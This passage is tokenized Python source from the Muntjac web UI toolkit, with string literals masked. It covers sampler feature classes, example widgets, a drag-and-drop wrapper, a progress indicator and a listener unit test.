<EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( Tree ) , APIResource ( IDropHandler ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> return [ <EOL> DragDropTableTree , <EOL> DragDropServerValidation , <EOL> DragDropRearrangeComponents , <EOL> DragDropHtml5FromDesktop <EOL> ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> from muntjac . api import HorizontalLayout <EOL> class ExpandingComponent ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . OLD <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( HorizontalLayout ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> return [ ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> from muntjac . ui . menu_bar import MenuBar <EOL> class BasicMenuBar ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . V62 <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( MenuBar ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> from muntjac . demo . sampler . features . menubar . MenuBarTooltips import MenuBarTooltips <EOL> from muntjac . demo . sampler . features . menubar . MenuBarHiddenItems import MenuBarHiddenItems <EOL> from muntjac . demo . sampler . features . menubar . MenuBarWithIcons import MenuBarWithIcons <EOL> from muntjac . demo . sampler . features . menubar . MenuBarItemStyles import MenuBarItemStyles <EOL> from muntjac . demo . sampler . features . menubar . MenuBarCollapsing import MenuBarCollapsing <EOL> return [ <EOL> MenuBarWithIcons , <EOL> MenuBarCollapsing , <EOL> MenuBarHiddenItems , <EOL> MenuBarItemStyles , <EOL> MenuBarTooltips <EOL> ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . api import VerticalLayout , Panel , Label , Button <EOL> from muntjac . ui . button import IClickListener <EOL> class PanelBasicExample ( VerticalLayout , IClickListener ) : <EOL> def __init__ ( self ) : <EOL> super ( PanelBasicExample , self ) . __init__ ( ) <EOL> self . setSpacing ( True ) <EOL> self . _panel = Panel ( '<STR_LIT>' ) <EOL> self . _panel . setHeight ( '<STR_LIT>' ) <EOL> layout = self . _panel . getContent ( ) <EOL> layout . setMargin ( True ) <EOL> layout . setSpacing ( True ) <EOL> self . addComponent ( self . _panel ) <EOL> for _ in range ( <NUM_LIT:20> ) : <EOL> l = Label ( '<STR_LIT>' ) <EOL> self . _panel . addComponent ( l ) <EOL> b = Button ( '<STR_LIT>' ) <EOL> b . addListener ( self , IClickListener ) <EOL> self . addComponent ( b ) <EOL> def buttonClick ( self , event ) : <EOL> if self . _panel . getCaption ( ) == '<STR_LIT>' : <EOL> self . _panel . setCaption ( '<STR_LIT>' ) <EOL> else : <EOL> self . _panel . setCaption ( '<STR_LIT>' ) </s>
<s> from muntjac . demo . sampler . features . selects . TwinColumnSelect import TwinColumnSelect <EOL> from muntjac . demo . sampler . features . selects . OptionGroups import OptionGroups <EOL> from muntjac . demo . sampler . features . selects . NativeSelection import NativeSelection <EOL> from muntjac . demo . sampler . features . selects . ListSelectMultiple import ListSelectMultiple <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> from muntjac . ui . option_group import OptionGroup <EOL> class OptionGroupDisabledItems ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . V64 <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( OptionGroup ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> return [ <EOL> OptionGroups , <EOL> NativeSelection , <EOL> ListSelectMultiple , <EOL> TwinColumnSelect <EOL> ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . ui . table import Table <EOL> from muntjac . demo . sampler . features . table . TableMainFeaturesExample import TableMainFeaturesExample <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> class TableHeaderIcons ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . OLD <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getExample ( self ) : <EOL> return TableMainFeaturesExample ( ) <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( Table ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> from muntjac . demo . sampler . FeatureSet import Tables <EOL> return [ Tables ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> from muntjac . api import HorizontalLayout , Button , Label , TextArea <EOL> from muntjac . data . property import IValueChangeListener <EOL> class TextAreaExample ( HorizontalLayout , IValueChangeListener ) : <EOL> _initialText = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( TextAreaExample , self ) . __init__ ( ) <EOL> self . setSpacing ( True ) <EOL> self . setWidth ( '<STR_LIT>' ) <EOL> self . _editor = TextArea ( None , self . _initialText ) <EOL> self . _editor . setRows ( <NUM_LIT:20> ) <EOL> self . _editor . setColumns ( <NUM_LIT:20> ) <EOL> self . _editor . addListener ( self , IValueChangeListener ) <EOL> self . _editor . setImmediate ( True ) <EOL> self . addComponent ( self . _editor ) <EOL> self . addComponent ( Button ( '<STR_LIT:>>' ) ) <EOL> self . _plainText = Label ( self . _initialText ) <EOL> self . _plainText . setContentMode ( Label . CONTENT_XHTML ) <EOL> self . addComponent ( self . _plainText ) <EOL> self . setExpandRatio ( self . _plainText , <NUM_LIT:1> ) <EOL> def valueChange ( self , event ) : <EOL> text = self . _editor . getValue ( ) <EOL> if text is not None : <EOL> text = text . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> self . _plainText . setValue ( text ) </s>
<s> from muntjac . ui . window import Window <EOL> from muntjac . demo . sampler . APIResource import APIResource <EOL> from muntjac . demo . sampler . Feature import Feature , Version <EOL> class SubwindowAutoSized ( Feature ) : <EOL> def getSinceVersion ( self ) : <EOL> return Version . OLD <EOL> def getName ( self ) : <EOL> return '<STR_LIT>' <EOL> def getDescription ( self ) : <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def getRelatedAPI ( self ) : <EOL> return [ APIResource ( Window ) ] <EOL> def getRelatedFeatures ( self ) : <EOL> from muntjac . demo . sampler . FeatureSet import Windows <EOL> from muntjac . demo . sampler . features . windows . SubwindowSized import SubwindowSized <EOL> return [ SubwindowSized , Windows ] <EOL> def getRelatedResources ( self ) : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> from muntjac . event . dd . acceptcriteria . accept_criterion import IAcceptCriterion <EOL> class ServerSideCriterion ( IAcceptCriterion ) : <EOL> """<STR_LIT>""" <EOL> def isClientSideVerifiable ( self ) : <EOL> return False <EOL> def paint ( self , target ) : <EOL> target . startTag ( '<STR_LIT>' ) <EOL> target . addAttribute ( '<STR_LIT:name>' , self . getIdentifier ( ) ) <EOL> self . paintContent ( target ) <EOL> target . endTag ( '<STR_LIT>' ) <EOL> def paintContent ( self , target ) : <EOL> pass <EOL> def paintResponse ( self , target ) : <EOL> pass <EOL> def getIdentifier ( self ) : <EOL> return '<STR_LIT>' </s>
<s> from muntjac . service . file_type_resolver import FileTypeResolver <EOL> from muntjac . terminal . application_resource import IApplicationResource <EOL> from muntjac . terminal . download_stream import DownloadStream <EOL> class ClassResource ( IApplicationResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> self . _bufferSize = <NUM_LIT:0> <EOL> self . _cacheTime = self . DEFAULT_CACHETIME <EOL> self . _associatedClass = None <EOL> self . _resourceName = None <EOL> self . _application = None <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:2> : <EOL> resourceName , application = args <EOL> self . _associatedClass = application . __class__ <EOL> self . _resourceName = resourceName <EOL> self . _application = application <EOL> if resourceName is None : <EOL> raise ValueError <EOL> application . addResource ( self ) <EOL> elif nargs == <NUM_LIT:3> : <EOL> associatedClass , resourceName , application = args <EOL> self . _associatedClass = associatedClass <EOL> self . _resourceName = resourceName <EOL> self . _application = application <EOL> if ( resourceName is None ) or ( associatedClass is None ) : <EOL> raise ValueError <EOL> application . addResource ( self ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def getMIMEType ( self ) : <EOL> """<STR_LIT>""" <EOL> return FileTypeResolver . getMIMEType ( self . _resourceName ) <EOL> def getApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _application <EOL> def getFilename ( self ) : <EOL> """<STR_LIT>""" <EOL> index = <NUM_LIT:0> <EOL> idx = self . _resourceName . find ( '<STR_LIT:/>' , index ) <EOL> while idx > <NUM_LIT:0> and idx + <NUM_LIT:1> < len ( self . _resourceName ) : <EOL> index = idx + <NUM_LIT:1> <EOL> idx = self . _resourceName . find ( '<STR_LIT:/>' , index ) <EOL> return self . _resourceName [ index : ] <EOL> def getStream ( self ) : <EOL> """<STR_LIT>""" <EOL> ds = DownloadStream ( <EOL> self . _associatedClass . 
getResourceAsStream ( self . _resourceName ) , <EOL> self . getMIMEType ( ) , self . getFilename ( ) ) <EOL> ds . setBufferSize ( self . getBufferSize ( ) ) <EOL> ds . setCacheTime ( self . _cacheTime ) <EOL> return ds <EOL> def getBufferSize ( self ) : <EOL> return self . _bufferSize <EOL> def setBufferSize ( self , bufferSize ) : <EOL> """<STR_LIT>""" <EOL> self . _bufferSize = bufferSize <EOL> def getCacheTime ( self ) : <EOL> return self . _cacheTime <EOL> def setCacheTime ( self , cacheTime ) : <EOL> """<STR_LIT>""" <EOL> self . _cacheTime = cacheTime </s>
<s> class VVideo ( object ) : <EOL> ATTR_POSTER = "<STR_LIT>" </s>
<s> class IResource ( object ) : <EOL> """<STR_LIT>""" <EOL> def getMIMEType ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
<s> from muntjac . test . server . component . abstract_listener_methods_test import AbstractListenerMethodsTest <EOL> from muntjac . ui . embedded import Embedded <EOL> from muntjac . event . mouse_events import ClickEvent , IClickListener <EOL> class EmbeddedListeners ( AbstractListenerMethodsTest ) : <EOL> def testClickListenerAddGetRemove ( self ) : <EOL> self . _testListenerAddGetRemove ( Embedded , ClickEvent , IClickListener ) </s>
<s> from unittest import TestCase <EOL> from muntjac . ui . label import Label <EOL> from muntjac . ui . horizontal_layout import HorizontalLayout <EOL> from muntjac . ui . grid_layout import GridLayout <EOL> from muntjac . ui . absolute_layout import AbsoluteLayout <EOL> from muntjac . ui . css_layout import CssLayout <EOL> from muntjac . ui . abstract_ordered_layout import AbstractOrderedLayout <EOL> from muntjac . ui . component_container import IComponentAttachListener , IComponentDetachListener <EOL> class ComponentAttachDetachListenerTest ( TestCase ) : <EOL> def resetVariables ( self ) : <EOL> self . _attachCounter = <NUM_LIT:0> <EOL> self . _attachedComponent = None <EOL> self . _attachTarget = None <EOL> self . _foundInContainer = False <EOL> self . _detachCounter = <NUM_LIT:0> <EOL> self . _detachedComponent = None <EOL> self . _detachedTarget = None <EOL> self . _indexOfComponent = - <NUM_LIT:1> <EOL> self . _componentArea = None <EOL> self . _componentPosition = None <EOL> def setUp ( self ) : <EOL> super ( ComponentAttachDetachListenerTest , self ) . setUp ( ) <EOL> self . _attachCounter = <NUM_LIT:0> <EOL> self . _attachedComponent = None <EOL> self . _attachTarget = None <EOL> self . _foundInContainer = False <EOL> self . _detachCounter = <NUM_LIT:0> <EOL> self . _detachedComponent = None <EOL> self . _detachedTarget = None <EOL> self . _indexOfComponent = - <NUM_LIT:1> <EOL> self . _componentArea = None <EOL> self . _componentPosition = None <EOL> self . _olayout = HorizontalLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _olayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _olayout . addListener ( listener , IComponentDetachListener ) <EOL> self . _gridlayout = GridLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _gridlayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _gridlayout . 
addListener ( listener , IComponentDetachListener ) <EOL> self . _absolutelayout = AbsoluteLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _absolutelayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _absolutelayout . addListener ( listener , IComponentDetachListener ) <EOL> self . _csslayout = CssLayout ( ) <EOL> listener = MyAttachListener ( self ) <EOL> self . _csslayout . addListener ( listener , IComponentAttachListener ) <EOL> listener = MyDetachListener ( self ) <EOL> self . _csslayout . addListener ( listener , IComponentDetachListener ) <EOL> def testOrderedLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _olayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _olayout , self . _attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> self . assertFalse ( self . _indexOfComponent == - <NUM_LIT:1> ) <EOL> def testOrderedLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _olayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _olayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _olayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> self . assertEquals ( - <NUM_LIT:1> , self . _indexOfComponent ) <EOL> def testGridLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _gridlayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _gridlayout , self . 
_attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> self . assertIsNotNone ( self . _componentArea ) <EOL> def testGridLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _gridlayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _gridlayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _gridlayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> self . assertIsNone ( self . _componentArea ) <EOL> def testAbsoluteLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _absolutelayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _absolutelayout , self . _attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> self . assertIsNotNone ( self . _componentPosition ) <EOL> def testAbsoluteLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _absolutelayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _absolutelayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _absolutelayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> self . assertIsNone ( self . _componentPosition ) <EOL> def testCSSLayoutAttachListener ( self ) : <EOL> self . resetVariables ( ) <EOL> comp = Label ( ) <EOL> self . _csslayout . addComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _attachCounter ) <EOL> self . assertEquals ( comp , self . _attachedComponent ) <EOL> self . assertEquals ( self . _csslayout , self . 
_attachTarget ) <EOL> self . assertTrue ( self . _foundInContainer ) <EOL> def testCSSLayoutDetachListener ( self ) : <EOL> comp = Label ( ) <EOL> self . _csslayout . addComponent ( comp ) <EOL> self . resetVariables ( ) <EOL> self . _csslayout . removeComponent ( comp ) <EOL> self . assertEquals ( <NUM_LIT:1> , self . _detachCounter ) <EOL> self . assertEquals ( comp , self . _detachedComponent ) <EOL> self . assertEquals ( self . _csslayout , self . _detachedTarget ) <EOL> self . assertFalse ( self . _foundInContainer ) <EOL> class MyAttachListener ( IComponentAttachListener ) : <EOL> def __init__ ( self , test ) : <EOL> self . _test = test <EOL> def componentAttachedToContainer ( self , event ) : <EOL> self . _test . _attachCounter += <NUM_LIT:1> <EOL> self . _test . _attachedComponent = event . getAttachedComponent ( ) <EOL> self . _test . _attachTarget = event . getContainer ( ) <EOL> it = self . _test . _attachTarget . getComponentIterator ( ) <EOL> while True : <EOL> try : <EOL> if it . next ( ) == self . _test . _attachedComponent : <EOL> self . _test . _foundInContainer = True <EOL> break <EOL> except StopIteration : <EOL> break <EOL> if isinstance ( self . _test . _attachTarget , AbstractOrderedLayout ) : <EOL> self . _test . _indexOfComponent = self . _test . _attachTarget . getComponentIndex ( <EOL> self . _test . _attachedComponent ) <EOL> elif isinstance ( self . _test . _attachTarget , GridLayout ) : <EOL> self . _test . _componentArea = self . _test . _attachTarget . getComponentArea ( <EOL> self . _test . _attachedComponent ) <EOL> elif isinstance ( self . _test . _attachTarget , AbsoluteLayout ) : <EOL> self . _test . _componentPosition = self . _test . _attachTarget . getPosition ( <EOL> self . _test . _attachedComponent ) <EOL> class MyDetachListener ( IComponentDetachListener ) : <EOL> def __init__ ( self , test ) : <EOL> self . _test = test <EOL> def componentDetachedFromContainer ( self , event ) : <EOL> self . _test . 
_detachCounter += <NUM_LIT:1> <EOL> self . _test . _detachedComponent = event . getDetachedComponent ( ) <EOL> self . _test . _detachedTarget = event . getContainer ( ) <EOL> it = self . _test . _detachedTarget . getComponentIterator ( ) <EOL> while True : <EOL> try : <EOL> if it . next ( ) == self . _test . _detachedComponent : <EOL> self . _test . _foundInContainer = True <EOL> break <EOL> except StopIteration : <EOL> break <EOL> if isinstance ( self . _test . _detachedTarget , AbstractOrderedLayout ) : <EOL> self . _test . _indexOfComponent = self . _test . _detachedTarget . getComponentIndex ( <EOL> self . _test . _detachedComponent ) <EOL> elif isinstance ( self . _test . _detachedTarget , GridLayout ) : <EOL> self . _test . _componentArea = self . _test . _detachedTarget . getComponentArea ( <EOL> self . _test . _detachedComponent ) <EOL> elif isinstance ( self . _test . _detachedTarget , AbsoluteLayout ) : <EOL> self . _test . _componentPosition = self . _test . _detachedTarget . getPosition ( <EOL> self . _test . _detachedComponent ) </s>
<s> """<STR_LIT>""" </s>
<s> from muntjac . event . transferable_impl import TransferableImpl <EOL> from muntjac . event . dd . drag_source import IDragSource <EOL> from muntjac . event . dd . drop_target import IDropTarget <EOL> from muntjac . event . dd . target_details_impl import TargetDetailsImpl <EOL> from muntjac . ui . html5_file import Html5File <EOL> from muntjac . ui . custom_component import CustomComponent <EOL> from muntjac . terminal . gwt . client . mouse_event_details import MouseEventDetails <EOL> from muntjac . terminal . stream_variable import ( IStreamVariable , IStreamingEndEvent , IStreamingErrorEvent , <EOL> IStreamingProgressEvent , IStreamingStartEvent ) <EOL> from muntjac . terminal . gwt . client . ui . dd . horizontal_drop_location import HorizontalDropLocation <EOL> from muntjac . terminal . gwt . client . ui . dd . vertical_drop_location import VerticalDropLocation <EOL> class DragAndDropWrapper ( CustomComponent , IDropTarget , IDragSource ) : <EOL> CLIENT_WIDGET = None <EOL> def __init__ ( self , root ) : <EOL> """<STR_LIT>""" <EOL> super ( DragAndDropWrapper , self ) . __init__ ( root ) <EOL> self . _receivers = dict ( ) <EOL> self . _dragStartMode = DragStartMode . NONE <EOL> self . _dropHandler = None <EOL> def paintContent ( self , target ) : <EOL> super ( DragAndDropWrapper , self ) . paintContent ( target ) <EOL> target . addAttribute ( '<STR_LIT>' , <EOL> DragStartMode . ordinal ( self . _dragStartMode ) ) <EOL> if self . getDropHandler ( ) is not None : <EOL> self . getDropHandler ( ) . getAcceptCriterion ( ) . paint ( target ) <EOL> if self . _receivers is not None and len ( self . _receivers ) > <NUM_LIT:0> : <EOL> for idd , html5File in self . _receivers . iteritems ( ) : <EOL> if html5File . getStreamVariable ( ) is not None : <EOL> target . addVariable ( self , '<STR_LIT>' + idd , <EOL> ProxyReceiver ( html5File ) ) <EOL> else : <EOL> target . addVariable ( self , '<STR_LIT>' + idd , None ) <EOL> del self . 
_receivers [ idd ] <EOL> def getDropHandler ( self ) : <EOL> return self . _dropHandler <EOL> def setDropHandler ( self , dropHandler ) : <EOL> self . _dropHandler = dropHandler <EOL> self . requestRepaint ( ) <EOL> def translateDropTargetDetails ( self , clientVariables ) : <EOL> return WrapperTargetDetails ( clientVariables , self ) <EOL> def getTransferable ( self , rawVariables ) : <EOL> return WrapperTransferable ( self , rawVariables ) <EOL> def setDragStartMode ( self , dragStartMode ) : <EOL> self . _dragStartMode = dragStartMode <EOL> self . requestRepaint ( ) <EOL> def getDragStartMode ( self ) : <EOL> return self . _dragStartMode <EOL> class WrapperTransferable ( TransferableImpl ) : <EOL> def __init__ ( self , sourceComponent , rawVariables ) : <EOL> super ( WrapperTransferable , self ) . __init__ ( sourceComponent , rawVariables ) <EOL> self . _files = None <EOL> fc = rawVariables . get ( '<STR_LIT>' ) <EOL> if fc is not None : <EOL> self . _files = [ None ] * fc <EOL> for i in range ( fc ) : <EOL> fd = Html5File ( rawVariables . get ( '<STR_LIT>' % i ) , <EOL> rawVariables . get ( '<STR_LIT>' % i ) , <EOL> rawVariables . get ( '<STR_LIT>' % i ) ) <EOL> idd = rawVariables . get ( '<STR_LIT>' % i ) <EOL> self . _files [ i ] = fd <EOL> self . _sourceComponent . _receivers [ idd ] = fd <EOL> self . _sourceComponent . requestRepaint ( ) <EOL> def getDraggedComponent ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getData ( '<STR_LIT>' ) <EOL> def getMouseDownEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> return MouseEventDetails . deSerialize ( self . getData ( '<STR_LIT>' ) ) <EOL> def getFiles ( self ) : <EOL> return self . _files <EOL> def getText ( self ) : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> if data is None : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return data <EOL> def getHtml ( self ) : <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> if data is None : <EOL> data = self . 
getData ( '<STR_LIT>' ) <EOL> return data <EOL> class WrapperTargetDetails ( TargetDetailsImpl ) : <EOL> def __init__ ( self , rawDropData , wrapper ) : <EOL> super ( WrapperTargetDetails , self ) . __init__ ( rawDropData , wrapper ) <EOL> def getAbsoluteLeft ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getData ( '<STR_LIT>' ) <EOL> def getAbsoluteTop ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getData ( '<STR_LIT>' ) <EOL> def getMouseEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> return MouseEventDetails . deSerialize ( self . getData ( '<STR_LIT>' ) ) <EOL> def getVerticalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return VerticalDropLocation . valueOf [ data ] <EOL> def getHorizontalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . getData ( '<STR_LIT>' ) <EOL> return HorizontalDropLocation . valueOf [ data ] <EOL> def verticalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getVerticalDropLocation ( ) <EOL> def horizontalDropLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getHorizontalDropLocation ( ) <EOL> class DragStartMode ( object ) : <EOL> NONE = '<STR_LIT>' <EOL> COMPONENT = '<STR_LIT>' <EOL> WRAPPER = '<STR_LIT>' <EOL> _values = [ NONE , COMPONENT , WRAPPER ] <EOL> @ classmethod <EOL> def values ( cls ) : <EOL> return cls . _values [ : ] <EOL> @ classmethod <EOL> def ordinal ( cls , val ) : <EOL> return cls . _values . index ( val ) <EOL> class ProxyReceiver ( IStreamVariable ) : <EOL> def __init__ ( self , fd ) : <EOL> self . _file = fd <EOL> self . _listenProgressOfUploadedFile = None <EOL> def getOutputStream ( self ) : <EOL> if self . _file . getStreamVariable ( ) is None : <EOL> return None <EOL> return self . _file . getStreamVariable ( ) . getOutputStream ( ) <EOL> def listenProgress ( self ) : <EOL> return self . _file . getStreamVariable ( ) . 
listenProgress ( ) <EOL> def onProgress ( self , event ) : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . onProgress ( wrapper ) <EOL> def streamingStarted ( self , event ) : <EOL> self . _listenProgressOfUploadedFile = self . _file . getStreamVariable ( ) is not None <EOL> if self . _listenProgressOfUploadedFile : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . streamingStarted ( wrapper ) <EOL> self . receivers . remove ( self . _file ) <EOL> event . disposeStreamVariable ( ) <EOL> def streamingFinished ( self , event ) : <EOL> if self . _listenProgressOfUploadedFile : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . streamingFinished ( wrapper ) <EOL> def streamingFailed ( self , event ) : <EOL> if self . _listenProgressOfUploadedFile : <EOL> wrapper = ReceivingEventWrapper ( event , self . _file , self ) <EOL> self . _file . getStreamVariable ( ) . streamingFailed ( wrapper ) <EOL> def isInterrupted ( self ) : <EOL> return self . _file . getStreamVariable ( ) . isInterrupted ( ) <EOL> class ReceivingEventWrapper ( IStreamingErrorEvent , IStreamingEndEvent , <EOL> IStreamingStartEvent , IStreamingProgressEvent ) : <EOL> def __init__ ( self , e , fd , receiver ) : <EOL> self . _wrappedEvent = e <EOL> self . _file = fd <EOL> self . _receiver = receiver <EOL> def getMimeType ( self ) : <EOL> return self . _file . getType ( ) <EOL> def getFileName ( self ) : <EOL> return self . _file . getFileName ( ) <EOL> def getContentLength ( self ) : <EOL> return self . _file . getFileSize ( ) <EOL> def getReceiver ( self ) : <EOL> return self . _receiver <EOL> def getException ( self ) : <EOL> if isinstance ( self . _wrappedEvent , IStreamingErrorEvent ) : <EOL> return self . _wrappedEvent . 
getException ( ) <EOL> return None <EOL> def getBytesReceived ( self ) : <EOL> return self . _wrappedEvent . getBytesReceived ( ) <EOL> def disposeStreamVariable ( self ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from muntjac . data . util . object_property import ObjectProperty <EOL> from muntjac . ui . abstract_field import AbstractField <EOL> from muntjac . data import property as prop <EOL> class ProgressIndicator ( AbstractField , prop . IValueChangeListener , <EOL> prop . IProperty , prop . IViewer ) : <EOL> """<STR_LIT>""" <EOL> CLIENT_WIDGET = None <EOL> CONTENT_TEXT = <NUM_LIT:0> <EOL> CONTENT_PREFORMATTED = <NUM_LIT:1> <EOL> def __init__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> super ( ProgressIndicator , self ) . __init__ ( ) <EOL> self . _indeterminate = False <EOL> self . _dataSource = None <EOL> self . _pollingInterval = <NUM_LIT:1000> <EOL> nargs = len ( args ) <EOL> if nargs == <NUM_LIT:0> : <EOL> self . setPropertyDataSource ( ObjectProperty ( <NUM_LIT:0.0> , float ) ) <EOL> elif nargs == <NUM_LIT:1> : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , prop . IProperty ) : <EOL> contentSource , = args <EOL> self . setPropertyDataSource ( contentSource ) <EOL> else : <EOL> value , = args <EOL> self . setPropertyDataSource ( ObjectProperty ( value , float ) ) <EOL> else : <EOL> raise ValueError , '<STR_LIT>' <EOL> def setReadOnly ( self , readOnly ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> self . _dataSource . setReadOnly ( readOnly ) <EOL> def isReadOnly ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return self . _dataSource . isReadOnly ( ) <EOL> def paintContent ( self , target ) : <EOL> """<STR_LIT>""" <EOL> target . addAttribute ( '<STR_LIT>' , self . _indeterminate ) <EOL> target . addAttribute ( '<STR_LIT>' , self . _pollingInterval ) <EOL> target . addAttribute ( '<STR_LIT:state>' , str ( self . getValue ( ) ) ) <EOL> def getValue ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return self . _dataSource . 
